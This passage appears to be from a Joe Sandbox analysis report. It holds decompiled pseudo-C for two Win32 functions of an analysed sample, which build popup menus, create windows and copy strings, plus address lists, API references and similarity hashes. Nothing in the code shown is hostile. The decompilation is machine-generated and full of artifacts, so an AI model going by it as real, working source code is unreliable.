                                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                                          				_t172 = __ecx;
                                                                                                                                                                                                                                                                                          				_t164 = __ebx;
                                                                                                                                                                                                                                                                                          				_push(__ecx);
                                                                                                                                                                                                                                                                                          				_t206 = __eax;
                                                                                                                                                                                                                                                                                          				if(__ebx != 0) {
                                                                                                                                                                                                                                                                                          					_t1 = _t206 + 8; // 0x112e0c
                                                                                                                                                                                                                                                                                          					_t214 = _t1;
                                                                                                                                                                                                                                                                                          					if(_t214 == 0 || __eax == 0) {
                                                                                                                                                                                                                                                                                          						RaiseException(0xc0000005, 1, 0, 0);
                                                                                                                                                                                                                                                                                          						asm("int3");
                                                                                                                                                                                                                                                                                          						asm("int3");
                                                                                                                                                                                                                                                                                          						asm("int3");
                                                                                                                                                                                                                                                                                          						asm("int3");
                                                                                                                                                                                                                                                                                          						asm("int3");
                                                                                                                                                                                                                                                                                          						asm("int3");
                                                                                                                                                                                                                                                                                          						asm("int3");
                                                                                                                                                                                                                                                                                          						_t227 = _t228;
                                                                                                                                                                                                                                                                                          						_t110 =  *0x159060; // 0x1f9a9bdf
                                                                                                                                                                                                                                                                                          						_v24 = _t110 ^ _t227;
                                                                                                                                                                                                                                                                                          						_push(_t164);
                                                                                                                                                                                                                                                                                          						_push(_t214);
                                                                                                                                                                                                                                                                                          						_push(_t206);
                                                                                                                                                                                                                                                                                          						_t215 = _t172;
                                                                                                                                                                                                                                                                                          						_v292 = _t215;
                                                                                                                                                                                                                                                                                          						_v460 = 0x50;
                                                                                                                                                                                                                                                                                          						E00106820( &_v456, 0, 0x4c);
                                                                                                                                                                                                                                                                                          						_t114 =  *(_t215 + 4);
                                                                                                                                                                                                                                                                                          						_t230 = _t228 - 0x1bc + 0xc;
                                                                                                                                                                                                                                                                                          						_v456 = 0x10;
                                                                                                                                                                                                                                                                                          						_t196 = _t114[3];
                                                                                                                                                                                                                                                                                          						_t173 =  &_v460;
                                                                                                                                                                                                                                                                                          						SendMessageA( *_t114, 0x41d, _t114[3], _t173);
                                                                                                                                                                                                                                                                                          						_t207 = _v428;
                                                                                                                                                                                                                                                                                          						_t117 = SendMessageA(_t207, 0x418, 0, 0);
                                                                                                                                                                                                                                                                                          						_v296 = _t117;
                                                                                                                                                                                                                                                                                          						if(_t117 <= 0) {
                                                                                                                                                                                                                                                                                          							L37:
                                                                                                                                                                                                                                                                                          							_pop(_t208);
                                                                                                                                                                                                                                                                                          							_pop(_t216);
                                                                                                                                                                                                                                                                                          							_pop(_t166);
                                                                                                                                                                                                                                                                                          							return E001059E6(0, _t166, _v12 ^ _t227, _t196, _t208, _t216);
                                                                                                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                                                                                                          							_t120 = SendMessageA(_t207, 0x52e, 0, 0);
                                                                                                                                                                                                                                                                                          							_v288 = _t120;
                                                                                                                                                                                                                                                                                          							 *((char*)(_t215 + 8)) = _t173 & 0xffffff00 | _t120 != 0x00000000;
                                                                                                                                                                                                                                                                                          							_t121 = CreatePopupMenu();
                                                                                                                                                                                                                                                                                          							_t196 =  &_v268;
                                                                                                                                                                                                                                                                                          							_v272 = _t121;
                                                                                                                                                                                                                                                                                          							_t217 = 0;
                                                                                                                                                                                                                                                                                          							_v268.left = 0;
                                                                                                                                                                                                                                                                                          							_v268.top = 0;
                                                                                                                                                                                                                                                                                          							_v268.right = 0;
                                                                                                                                                                                                                                                                                          							_v268.bottom = 0;
                                                                                                                                                                                                                                                                                          							GetClientRect(_t207,  &_v268);
                                                                                                                                                                                                                                                                                          							_v276 = 0;
                                                                                                                                                                                                                                                                                          							if(_v284 > 0) {
                                                                                                                                                                                                                                                                                          								while(1) {
                                                                                                                                                                                                                                                                                          									_v236 = 0;
                                                                                                                                                                                                                                                                                          									_v232 = 0;
                                                                                                                                                                                                                                                                                          									_v228 = 0;
                                                                                                                                                                                                                                                                                          									_v224 = 0;
                                                                                                                                                                                                                                                                                          									_v220 = 0;
                                                                                                                                                                                                                                                                                          									SendMessageA(_t207, 0x417, _t217,  &_v236);
                                                                                                                                                                                                                                                                                          									if((_v228 & 0x00000008) != 0) {
                                                                                                                                                                                                                                                                                          										goto L32;
                                                                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                                                                          									_v252 = 0;
                                                                                                                                                                                                                                                                                          									_v248 = 0;
                                                                                                                                                                                                                                                                                          									_v244 = 0;
                                                                                                                                                                                                                                                                                          									_v240 = 0;
                                                                                                                                                                                                                                                                                          									SendMessageA(_t207, 0x41d, _t217,  &_v252);
                                                                                                                                                                                                                                                                                          									_t134 = _v228;
                                                                                                                                                                                                                                                                                          									_t196 = _v244;
                                                                                                                                                                                                                                                                                          									_t171 = _t134 >> 0x00000002 & 0x00000001;
                                                                                                                                                                                                                                                                                          									if(_v244 > _v268.right) {
                                                                                                                                                                                                                                                                                          										if((_t134 & 0x00000001) == 0) {
                                                                                                                                                                                                                                                                                          											_push(0xc7);
                                                                                                                                                                                                                                                                                          											_push(0);
                                                                                                                                                                                                                                                                                          											_v216 = 0;
                                                                                                                                                                                                                                                                                          											_push( &_v215);
                                                                                                                                                                                                                                                                                          											if(_v280[2] == 0) {
                                                                                                                                                                                                                                                                                          												E00106820();
                                                                                                                                                                                                                                                                                          												_t230 = _t230 + 0xc;
                                                                                                                                                                                                                                                                                          												_v316 = 0;
                                                                                                                                                                                                                                                                                          												_v296 = 0;
                                                                                                                                                                                                                                                                                          												_v292 = 0;
                                                                                                                                                                                                                                                                                          												_v312 = 0;
                                                                                                                                                                                                                                                                                          												_v308 = 0;
                                                                                                                                                                                                                                                                                          												_v304 = 0;
                                                                                                                                                                                                                                                                                          												_v300 = 0;
                                                                                                                                                                                                                                                                                          												_t220 =  &_v216;
                                                                                                                                                                                                                                                                                          												_v320 = 0x20;
                                                                                                                                                                                                                                                                                          												_v316 = 2;
                                                                                                                                                                                                                                                                                          												_v296 = _t220;
                                                                                                                                                                                                                                                                                          												_v292 = 0xc8;
                                                                                                                                                                                                                                                                                          												if(SendMessageA(_t207, 0x441, _v232,  &_v320) == 0xffffffff || lstrlenA(_t220) == 0) {
                                                                                                                                                                                                                                                                                          													_t220 = 0x11293e;
                                                                                                                                                                                                                                                                                          													_t141 = LoadStringA( *0x170c0c, _v232,  &_v216, 0xc8);
                                                                                                                                                                                                                                                                                          													_t182 = 0;
                                                                                                                                                                                                                                                                                          													if(_t141 > 0) {
                                                                                                                                                                                                                                                                                          														while( *((char*)(_t227 + _t182 - 0xd0)) != 0xa) {
                                                                                                                                                                                                                                                                                          															_t182 = _t182 + 1;
                                                                                                                                                                                                                                                                                          															if(_t182 < _t141) {
                                                                                                                                                                                                                                                                                          																continue;
                                                                                                                                                                                                                                                                                          															} else {
                                                                                                                                                                                                                                                                                          															}
                                                                                                                                                                                                                                                                                          															goto L31;
                                                                                                                                                                                                                                                                                          														}
                                                                                                                                                                                                                                                                                          														_t220 = _t227 + _t182 - 0xcf;
                                                                                                                                                                                                                                                                                          													}
                                                                                                                                                                                                                                                                                          												}
                                                                                                                                                                                                                                                                                          												L31:
                                                                                                                                                                                                                                                                                          												_t196 = _v232;
                                                                                                                                                                                                                                                                                          												AppendMenuA(_v272, 0 | _t171 == 0x00000000, _v232, _t220);
                                                                                                                                                                                                                                                                                          												_t217 = _v276;
                                                                                                                                                                                                                                                                                          											} else {
                                                                                                                                                                                                                                                                                          												E00106820();
                                                                                                                                                                                                                                                                                          												E00106820( &_v368, 0, 0x30);
                                                                                                                                                                                                                                                                                          												_t230 = _t230 + 0x18;
                                                                                                                                                                                                                                                                                          												_v368.cbSize = 0x30;
                                                                                                                                                                                                                                                                                          												if(E000F4890(_t171, _t207, _t217) != 0) {
                                                                                                                                                                                                                                                                                          													_v368.cbSize = 0x2c;
                                                                                                                                                                                                                                                                                          												}
                                                                                                                                                                                                                                                                                          												_v368.fMask = 0x14;
                                                                                                                                                                                                                                                                                          												_v368.dwTypeData =  &_v216;
                                                                                                                                                                                                                                                                                          												_v368.cch = 0xc8;
                                                                                                                                                                                                                                                                                          												GetMenuItemInfoA(_v288, _t217, 1,  &_v368);
                                                                                                                                                                                                                                                                                          												_t196 = _v272;
                                                                                                                                                                                                                                                                                          												AppendMenuA(_v272, 0 | _t171 == 0x00000000 | 0x00000010, _v368.hSubMenu, _v368.dwTypeData);
                                                                                                                                                                                                                                                                                          											}
                                                                                                                                                                                                                                                                                          										} else {
                                                                                                                                                                                                                                                                                          											if(GetMenuItemCount(_v272) > 0) {
                                                                                                                                                                                                                                                                                          												AppendMenuA(_v272, 0x800, 0, 0);
                                                                                                                                                                                                                                                                                          											}
                                                                                                                                                                                                                                                                                          										}
                                                                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                                                                          									L32:
                                                                                                                                                                                                                                                                                          									_t217 = _t217 + 1;
                                                                                                                                                                                                                                                                                          									_v276 = _t217;
                                                                                                                                                                                                                                                                                          									if(_t217 < _v284) {
                                                                                                                                                                                                                                                                                          										continue;
                                                                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                                                                          									goto L33;
                                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          							L33:
                                                                                                                                                                                                                                                                                          							_t218 = _v272;
                                                                                                                                                                                                                                                                                          							if(GetMenuItemCount(_t218) != 0) {
                                                                                                                                                                                                                                                                                          								_pop(_t209);
                                                                                                                                                                                                                                                                                          								 *_v280 = _t218;
                                                                                                                                                                                                                                                                                          								_pop(_t219);
                                                                                                                                                                                                                                                                                          								_pop(_t167);
                                                                                                                                                                                                                                                                                          								return E001059E6(1, _t167, _v12 ^ _t227, _v280, _t209, _t219);
                                                                                                                                                                                                                                                                                          							} else {
                                                                                                                                                                                                                                                                                          								if(_t218 != 0) {
                                                                                                                                                                                                                                                                                          									DestroyMenu(_t218);
                                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                                          								MessageBeep(0xffffffff);
                                                                                                                                                                                                                                                                                          								goto L37;
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                                                                                                          						 *_t214 = __eax;
                                                                                                                                                                                                                                                                                          						 *((intOrPtr*)(_t214 + 4)) = GetCurrentThreadId();
                                                                                                                                                                                                                                                                                          						EnterCriticalSection(0x170c68);
                                                                                                                                                                                                                                                                                          						_t157 =  *0x170c80; // 0x0
                                                                                                                                                                                                                                                                                          						 *((intOrPtr*)(_t214 + 8)) = _t157;
                                                                                                                                                                                                                                                                                          						 *0x170c80 = _t214;
                                                                                                                                                                                                                                                                                          						LeaveCriticalSection(0x170c68);
                                                                                                                                                                                                                                                                                          						_t221 = _a20;
                                                                                                                                                                                                                                                                                          						if(_t221 == 0 && (_a12 & 0x40000000) != 0) {
                                                                                                                                                                                                                                                                                          							_t221 = _t206;
                                                                                                                                                                                                                                                                                          							_a20 = _t221;
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          						_t158 = _a4;
                                                                                                                                                                                                                                                                                          						if(_t158 == 0) {
                                                                                                                                                                                                                                                                                          							_t158 = 0x15ad10;
                                                                                                                                                                                                                                                                                          							_a4 = 0x15ad10;
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          						_t11 =  &(_t158[1]); // 0x80000000
                                                                                                                                                                                                                                                                                          						_t203 =  *_t158;
                                                                                                                                                                                                                                                                                          						_t12 =  &(_t158[3]); // 0x0
                                                                                                                                                                                                                                                                                          						_t13 =  &(_t158[2]); // 0x0
                                                                                                                                                                                                                                                                                          						return CreateWindowExA(_a16, _t164 & 0x0000ffff, _a8, _a12,  *_t158,  *_t11,  *_t13 - _t203,  *_t12 -  *_t11, 0, _t221,  *0x170c08, 0);
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                                                                                          					return 0;
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          			}



































































                                                                                                                                                                                                                                                                                          0x000fff90
                                                                                                                                                                                                                                                                                          0x000fff90
                                                                                                                                                                                                                                                                                          0x000fff93
                                                                                                                                                                                                                                                                                          0x000fff96
                                                                                                                                                                                                                                                                                          0x000fff9b
                                                                                                                                                                                                                                                                                          0x000fffa6
                                                                                                                                                                                                                                                                                          0x000fffa6
                                                                                                                                                                                                                                                                                          0x000fffab
                                                                                                                                                                                                                                                                                          0x00100053
                                                                                                                                                                                                                                                                                          0x00100059
                                                                                                                                                                                                                                                                                          0x0010005a
                                                                                                                                                                                                                                                                                          0x0010005b
                                                                                                                                                                                                                                                                                          0x0010005c
                                                                                                                                                                                                                                                                                          0x0010005d
                                                                                                                                                                                                                                                                                          0x0010005e
                                                                                                                                                                                                                                                                                          0x0010005f
                                                                                                                                                                                                                                                                                          0x00100061
                                                                                                                                                                                                                                                                                          0x00100069
                                                                                                                                                                                                                                                                                          0x00100070
                                                                                                                                                                                                                                                                                          0x00100073
                                                                                                                                                                                                                                                                                          0x00100074
                                                                                                                                                                                                                                                                                          0x00100075
                                                                                                                                                                                                                                                                                          0x0010007e
                                                                                                                                                                                                                                                                                          0x00100083
                                                                                                                                                                                                                                                                                          0x00100089
                                                                                                                                                                                                                                                                                          0x00100093
                                                                                                                                                                                                                                                                                          0x00100098
                                                                                                                                                                                                                                                                                          0x001000a1
                                                                                                                                                                                                                                                                                          0x001000a4
                                                                                                                                                                                                                                                                                          0x001000ae
                                                                                                                                                                                                                                                                                          0x001000b3
                                                                                                                                                                                                                                                                                          0x001000c1
                                                                                                                                                                                                                                                                                          0x001000c3
                                                                                                                                                                                                                                                                                          0x001000d3
                                                                                                                                                                                                                                                                                          0x001000d5
                                                                                                                                                                                                                                                                                          0x001000dd
                                                                                                                                                                                                                                                                                          0x001003f7
                                                                                                                                                                                                                                                                                          0x001003f9
                                                                                                                                                                                                                                                                                          0x001003fa
                                                                                                                                                                                                                                                                                          0x001003fb
                                                                                                                                                                                                                                                                                          0x00100409
                                                                                                                                                                                                                                                                                          0x001000e3
                                                                                                                                                                                                                                                                                          0x001000ed
                                                                                                                                                                                                                                                                                          0x001000f4
                                                                                                                                                                                                                                                                                          0x001000fa
                                                                                                                                                                                                                                                                                          0x001000fd
                                                                                                                                                                                                                                                                                          0x00100103
                                                                                                                                                                                                                                                                                          0x00100109
                                                                                                                                                                                                                                                                                          0x00100112
                                                                                                                                                                                                                                                                                          0x00100115
                                                                                                                                                                                                                                                                                          0x0010011b
                                                                                                                                                                                                                                                                                          0x00100121
                                                                                                                                                                                                                                                                                          0x00100127
                                                                                                                                                                                                                                                                                          0x0010012d
                                                                                                                                                                                                                                                                                          0x00100133
                                                                                                                                                                                                                                                                                          0x0010013f
                                                                                                                                                                                                                                                                                          0x00100156
                                                                                                                                                                                                                                                                                          0x00100158
                                                                                                                                                                                                                                                                                          0x0010015e
                                                                                                                                                                                                                                                                                          0x00100164
                                                                                                                                                                                                                                                                                          0x0010016a
                                                                                                                                                                                                                                                                                          0x00100170
                                                                                                                                                                                                                                                                                          0x00100184
                                                                                                                                                                                                                                                                                          0x0010018d
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x001001a3
                                                                                                                                                                                                                                                                                          0x001001a9
                                                                                                                                                                                                                                                                                          0x001001af
                                                                                                                                                                                                                                                                                          0x001001b5
                                                                                                                                                                                                                                                                                          0x001001bb
                                                                                                                                                                                                                                                                                          0x001001bd
                                                                                                                                                                                                                                                                                          0x001001c3
                                                                                                                                                                                                                                                                                          0x001001ce
                                                                                                                                                                                                                                                                                          0x001001d7
                                                                                                                                                                                                                                                                                          0x001001e0
                                                                                                                                                                                                                                                                                          0x0010021c
                                                                                                                                                                                                                                                                                          0x00100227
                                                                                                                                                                                                                                                                                          0x00100229
                                                                                                                                                                                                                                                                                          0x00100230
                                                                                                                                                                                                                                                                                          0x00100231
                                                                                                                                                                                                                                                                                          0x001002ce
                                                                                                                                                                                                                                                                                          0x001002d5
                                                                                                                                                                                                                                                                                          0x001002d8
                                                                                                                                                                                                                                                                                          0x001002de
                                                                                                                                                                                                                                                                                          0x001002e4
                                                                                                                                                                                                                                                                                          0x001002f1
                                                                                                                                                                                                                                                                                          0x001002f7
                                                                                                                                                                                                                                                                                          0x001002fd
                                                                                                                                                                                                                                                                                          0x00100303
                                                                                                                                                                                                                                                                                          0x00100310
                                                                                                                                                                                                                                                                                          0x0010031e
                                                                                                                                                                                                                                                                                          0x00100328
                                                                                                                                                                                                                                                                                          0x00100332
                                                                                                                                                                                                                                                                                          0x00100338
                                                                                                                                                                                                                                                                                          0x0010034b
                                                                                                                                                                                                                                                                                          0x00100374
                                                                                                                                                                                                                                                                                          0x00100379
                                                                                                                                                                                                                                                                                          0x0010037f
                                                                                                                                                                                                                                                                                          0x00100383
                                                                                                                                                                                                                                                                                          0x00100385
                                                                                                                                                                                                                                                                                          0x0010038f
                                                                                                                                                                                                                                                                                          0x00100392
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00100394
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00100392
                                                                                                                                                                                                                                                                                          0x00100396
                                                                                                                                                                                                                                                                                          0x00100396
                                                                                                                                                                                                                                                                                          0x00100383
                                                                                                                                                                                                                                                                                          0x0010039d
                                                                                                                                                                                                                                                                                          0x0010039d
                                                                                                                                                                                                                                                                                          0x001003b4
                                                                                                                                                                                                                                                                                          0x001003ba
                                                                                                                                                                                                                                                                                          0x00100237
                                                                                                                                                                                                                                                                                          0x00100237
                                                                                                                                                                                                                                                                                          0x00100247
                                                                                                                                                                                                                                                                                          0x0010024c
                                                                                                                                                                                                                                                                                          0x0010024f
                                                                                                                                                                                                                                                                                          0x00100260
                                                                                                                                                                                                                                                                                          0x00100262
                                                                                                                                                                                                                                                                                          0x00100262
                                                                                                                                                                                                                                                                                          0x00100283
                                                                                                                                                                                                                                                                                          0x0010028d
                                                                                                                                                                                                                                                                                          0x00100293
                                                                                                                                                                                                                                                                                          0x0010029d
                                                                                                                                                                                                                                                                                          0x001002b7
                                                                                                                                                                                                                                                                                          0x001002c3
                                                                                                                                                                                                                                                                                          0x001002c3
                                                                                                                                                                                                                                                                                          0x001001e2
                                                                                                                                                                                                                                                                                          0x001001f1
                                                                                                                                                                                                                                                                                          0x00100207
                                                                                                                                                                                                                                                                                          0x00100207
                                                                                                                                                                                                                                                                                          0x001001f1
                                                                                                                                                                                                                                                                                          0x001001e0
                                                                                                                                                                                                                                                                                          0x001003c0
                                                                                                                                                                                                                                                                                          0x001003c0
                                                                                                                                                                                                                                                                                          0x001003c1
                                                                                                                                                                                                                                                                                          0x001003cd
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00100150
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x001003cd
                                                                                                                                                                                                                                                                                          0x00100156
                                                                                                                                                                                                                                                                                          0x001003d3
                                                                                                                                                                                                                                                                                          0x001003d3
                                                                                                                                                                                                                                                                                          0x001003e2
                                                                                                                                                                                                                                                                                          0x00100413
                                                                                                                                                                                                                                                                                          0x00100414
                                                                                                                                                                                                                                                                                          0x00100416
                                                                                                                                                                                                                                                                                          0x0010041b
                                                                                                                                                                                                                                                                                          0x00100424
                                                                                                                                                                                                                                                                                          0x001003e4
                                                                                                                                                                                                                                                                                          0x001003e6
                                                                                                                                                                                                                                                                                          0x001003e9
                                                                                                                                                                                                                                                                                          0x001003e9
                                                                                                                                                                                                                                                                                          0x001003f1
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x001003f1
                                                                                                                                                                                                                                                                                          0x001003e2
                                                                                                                                                                                                                                                                                          0x000fffb9
                                                                                                                                                                                                                                                                                          0x000fffb9
                                                                                                                                                                                                                                                                                          0x000fffc6
                                                                                                                                                                                                                                                                                          0x000fffc9
                                                                                                                                                                                                                                                                                          0x000fffcf
                                                                                                                                                                                                                                                                                          0x000fffd4
                                                                                                                                                                                                                                                                                          0x000fffdc
                                                                                                                                                                                                                                                                                          0x000fffe2
                                                                                                                                                                                                                                                                                          0x000fffe8
                                                                                                                                                                                                                                                                                          0x000fffed
                                                                                                                                                                                                                                                                                          0x000ffff8
                                                                                                                                                                                                                                                                                          0x000ffffa
                                                                                                                                                                                                                                                                                          0x000ffffa
                                                                                                                                                                                                                                                                                          0x000ffffd
                                                                                                                                                                                                                                                                                          0x00100002
                                                                                                                                                                                                                                                                                          0x00100004
                                                                                                                                                                                                                                                                                          0x00100009
                                                                                                                                                                                                                                                                                          0x00100009
                                                                                                                                                                                                                                                                                          0x0010000c
                                                                                                                                                                                                                                                                                          0x00100015
                                                                                                                                                                                                                                                                                          0x0010001b
                                                                                                                                                                                                                                                                                          0x0010001e
                                                                                                                                                                                                                                                                                          0x00100045
                                                                                                                                                                                                                                                                                          0x00100045
                                                                                                                                                                                                                                                                                          0x000fff9d
                                                                                                                                                                                                                                                                                          0x000fffa3
                                                                                                                                                                                                                                                                                          0x000fffa3

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 000FFFBB
                                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(00170C68,?,000FCD7C,?,00000000,06CF0000,00040100), ref: 000FFFC9
                                                                                                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(00170C68,?,000FCD7C,?,00000000,06CF0000,00040100), ref: 000FFFE2
                                                                                                                                                                                                                                                                                          • CreateWindowExA.USER32 ref: 0010003B
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.711567392.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.711475414.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712120214.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712120214.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712610122.0000000000159000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712714995.000000000015C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.713013679.0000000000170000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.713099356.0000000000173000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_f0000_fs7AQcREFX.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: CriticalSection$CreateCurrentEnterLeaveThreadWindow
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 3101199831-0
                                                                                                                                                                                                                                                                                          • Opcode ID: c68ff1506dcf69c98d4472e7a55ba7e162afc9ae9de41ad6aeac7ac2bc312f40
                                                                                                                                                                                                                                                                                          • Instruction ID: 48d959165f6f096b76ea986226a8cedd01a3c7db6cd89c22c7233ed635b26f11
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c68ff1506dcf69c98d4472e7a55ba7e162afc9ae9de41ad6aeac7ac2bc312f40
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 40217171600315AFD7168F54DD44FAB77A8EF88B50F158219F94897690D7B0EC80DB94
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                                                                                                          			E000FACF0(void* __esi, void* __eflags, intOrPtr _a4, CHAR* _a8, intOrPtr _a12) {
                                                                                                                                                                                                                                                                                          				void* __ebx;
                                                                                                                                                                                                                                                                                          				void* __edi;
                                                                                                                                                                                                                                                                                          				CHAR* _t38;
                                                                                                                                                                                                                                                                                          				intOrPtr* _t41;
                                                                                                                                                                                                                                                                                          				CHAR* _t42;
                                                                                                                                                                                                                                                                                          				void* _t43;
                                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                                          				_t43 = __esi;
                                                                                                                                                                                                                                                                                          				 *((intOrPtr*)(__esi + 4)) = 0;
                                                                                                                                                                                                                                                                                          				 *((intOrPtr*)(__esi + 0x14)) = 0;
                                                                                                                                                                                                                                                                                          				_t41 = __esi + 0x20;
                                                                                                                                                                                                                                                                                          				 *((intOrPtr*)(__esi + 0x18)) = 0;
                                                                                                                                                                                                                                                                                          				 *((intOrPtr*)(__esi + 0x1c)) = 0;
                                                                                                                                                                                                                                                                                          				E00106820(_t41, 0, 0x58);
                                                                                                                                                                                                                                                                                          				_t38 = __esi + 0x17c;
                                                                                                                                                                                                                                                                                          				 *_t38 = 0;
                                                                                                                                                                                                                                                                                          				 *((char*)(__esi + 0x7c)) = 0;
                                                                                                                                                                                                                                                                                          				 *((intOrPtr*)(__esi + 0x78)) = _a4;
                                                                                                                                                                                                                                                                                          				 *_t41 = 0x58;
                                                                                                                                                                                                                                                                                          				if(E000F4890(_t38, _t41, __esi) != 0) {
                                                                                                                                                                                                                                                                                          					 *_t41 = 0x4c;
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				_t42 = _a8;
                                                                                                                                                                                                                                                                                          				 *(_t43 + 0x3c) = _t38;
                                                                                                                                                                                                                                                                                          				 *((intOrPtr*)(_t43 + 0x40)) = 0x104;
                                                                                                                                                                                                                                                                                          				 *((intOrPtr*)(_t43 + 0x5c)) = 0;
                                                                                                                                                                                                                                                                                          				 *((intOrPtr*)(_t43 + 0x44)) = _t43 + 0x7c;
                                                                                                                                                                                                                                                                                          				 *((intOrPtr*)(_t43 + 0x48)) = 0x100;
                                                                                                                                                                                                                                                                                          				 *((intOrPtr*)(_t43 + 0x54)) = 0x880026;
                                                                                                                                                                                                                                                                                          				 *((intOrPtr*)(_t43 + 0x2c)) = _a12;
                                                                                                                                                                                                                                                                                          				 *((intOrPtr*)(_t43 + 0x28)) =  *0x170c0c;
                                                                                                                                                                                                                                                                                          				 *((intOrPtr*)(_t43 + 0x64)) = E00103D40;
                                                                                                                                                                                                                                                                                          				 *((intOrPtr*)(_t43 + 0x24)) = 0;
                                                                                                                                                                                                                                                                                          				if(_t42 == 0 || _t38 == 0) {
                                                                                                                                                                                                                                                                                          					L7:
                                                                                                                                                                                                                                                                                          					return _t43;
                                                                                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                                                                                          					if(lstrlenA(_t42) <= 0x103) {
                                                                                                                                                                                                                                                                                          						lstrcpynA(_t38, _t42, lstrlenA(_t42) + 1);
                                                                                                                                                                                                                                                                                          						goto L7;
                                                                                                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                                                                                                          						lstrcpynA(_t38, _t42, 0x104);
                                                                                                                                                                                                                                                                                          						return _t43;
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          			}









                                                                                                                                                                                                                                                                                          0x000facf0
                                                                                                                                                                                                                                                                                          0x000facf9
                                                                                                                                                                                                                                                                                          0x000facfd
                                                                                                                                                                                                                                                                                          0x000fad00
                                                                                                                                                                                                                                                                                          0x000fad04
                                                                                                                                                                                                                                                                                          0x000fad07
                                                                                                                                                                                                                                                                                          0x000fad0a
                                                                                                                                                                                                                                                                                          0x000fad12
                                                                                                                                                                                                                                                                                          0x000fad1b
                                                                                                                                                                                                                                                                                          0x000fad1e
                                                                                                                                                                                                                                                                                          0x000fad22
                                                                                                                                                                                                                                                                                          0x000fad25
                                                                                                                                                                                                                                                                                          0x000fad32
                                                                                                                                                                                                                                                                                          0x000fad34
                                                                                                                                                                                                                                                                                          0x000fad34
                                                                                                                                                                                                                                                                                          0x000fad3d
                                                                                                                                                                                                                                                                                          0x000fad45
                                                                                                                                                                                                                                                                                          0x000fad48
                                                                                                                                                                                                                                                                                          0x000fad4f
                                                                                                                                                                                                                                                                                          0x000fad52
                                                                                                                                                                                                                                                                                          0x000fad55
                                                                                                                                                                                                                                                                                          0x000fad5c
                                                                                                                                                                                                                                                                                          0x000fad63
                                                                                                                                                                                                                                                                                          0x000fad6b
                                                                                                                                                                                                                                                                                          0x000fad6e
                                                                                                                                                                                                                                                                                          0x000fad75
                                                                                                                                                                                                                                                                                          0x000fad7a
                                                                                                                                                                                                                                                                                          0x000fadb7
                                                                                                                                                                                                                                                                                          0x000fadbb
                                                                                                                                                                                                                                                                                          0x000fad80
                                                                                                                                                                                                                                                                                          0x000fad8c
                                                                                                                                                                                                                                                                                          0x000fadb0
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000fad8e
                                                                                                                                                                                                                                                                                          0x000fad97
                                                                                                                                                                                                                                                                                          0x000fada2
                                                                                                                                                                                                                                                                                          0x000fada2
                                                                                                                                                                                                                                                                                          0x000fad8c

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • _memset.LIBCMT ref: 000FAD0A
                                                                                                                                                                                                                                                                                            • Part of subcall function 000F4890: _memset.LIBCMT ref: 000F48B1
